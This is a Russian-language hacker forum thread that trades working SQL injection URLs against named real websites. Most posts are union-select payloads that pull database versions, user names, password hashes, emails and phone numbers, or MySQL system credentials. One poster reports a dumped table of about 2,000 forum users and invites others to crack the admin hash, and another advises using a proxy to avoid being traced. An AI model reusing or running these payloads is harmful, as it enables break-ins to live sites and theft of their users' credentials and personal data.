SQL Инъекции

Ты уже четвертый, кто выкладывает этот сайт...

 

=) ну так я же не проверяю все 68 страниц

 

ты тоже не первый =)

 

Code:

http://www.cmsobzor.ru/fa.php?aid=-99+union+select+user(),2,3,4,5,6,7,8,9,10,11/*

 

А вот сюда без прокси не лезть!:

__http://www.rjo.ru/news/index.php?rash=detail&idnews=-99+union+select+1,concat(id,char(58),login,char(58),name,char(58),email,char(58),phone,char(58),password),3,4,5,6,7+from+logins/*

спасибо kamaz'у за помощь!

 

улыбнуло =)

 

Code:

http://www.farma-96.ru/index.php?main=catalogue&object=round&round_ID=-1+union+select+1,2,3,4,concat(name,0x3a,pass),6,7,8,9,10+from+users/*

правда ничего не дало, но скуля)

 

пасиб за поправку
хз, я просто копаться дальше не стал))

 

Code:

http://www.it-news.cc/index.php?type=article&ID=-1+union+select+user()/*

Code:

http://www.toxic.com.ua/news_view.php?i=-1+union+select+1,2,3,4

Code:

http://tony.proskaters.kiev.ua/index.php?details=-1+union+select+1,2,3,4,5,6/*

не смог подобрать названия таблиц

Code:

http://www.rshu.edu.ua/?p=10&sid='

 

папок на запись не нашёл

 

__http://www.ergo-line.ru/operative/sng/?saleID=-1+union+select+1,2,concat(user(),char(58),database(),char(58),version()),4,5,6,7,8,9,10,11,12/*

__http://www.vechnayamolodost.ru/index2.php?idtopmenu=2&idsubmenu=-133+union+select+1,2,3,concat(user,char(58),password),5,6,7,8,9,0,11,12,13,14+from+mysql.user/*

 

http://publicsafetyinfo.wvu.edu/Transcript/?id=1+or+1=(select+TOP+1+table_name+from+INFORMATION_SCHEMA.TABLES)--

 

http://www.area3d.ch/downloads.php?cat=-99'+union+select+1,2,3/*
опять нифига не подобрал)) выведите юзеров булки лучше

 

2 _Pantera_
у меня этих скулей в эду доменах...
эта уже пару месяцев лежит, вот
http://moritzlaw.osu.edu/faculty/bios.php?ID=-99+union+select+1,2,3,password,username,6,7,8,9,10,11,12,13,14,15,16,17+from+access

 

Code:

http://www.piratesinfo.com/biography/biography.php?article_id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+INFORMATION_SCHEMA.TABLES/*

можете покопаться там много таблиц)

Code:

http://www.piratesinfo.com/biography/biography.php?article_id=-1+union+select+1,2,concat(username,0x3a,password,0x3a,email,0x3a,0x3a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+phorum_users/*

база 2к юзеров login:md5hash:email:: с форума

можете покопаться) хэш там расшифровать админский или другие таблицы глянуть..) я заколебался)

 

http://chaoscity.chaosroad.com/kernel/class/class.mysql.php

Вообще реально,что нибудь дальше?...подскажите нубу =)

 

нет

 

__http://www.center-torg.ru/?pageId=2&catId=-1+union+select+1,table_name,3,4,5,6,7+from+INFORMATION_SCHEMA.TABLES/*

__http://www.master-office.ru/index.php?l=2&pid=-1+union+select+1,2,user(),4,5,6,7/*

__http://www.kroki.ru/view_catalog.php?mtypeid=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5/*

 

Code:

http://www.ttg-java.ru/photo/gallery.php?_id=-1+union+select+1,version(),3,4/*

Code:

http://www.mobitronic.ru/index.php?part_id=-1+union+select+1,user()/*

Code:

http://www.gday.ru/print.php?cat=99999+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15/*

Code:

http://www.marinastilist.ru/foto.php?cat=-1+union+select+1,2,3,user(),5/*

 

][еК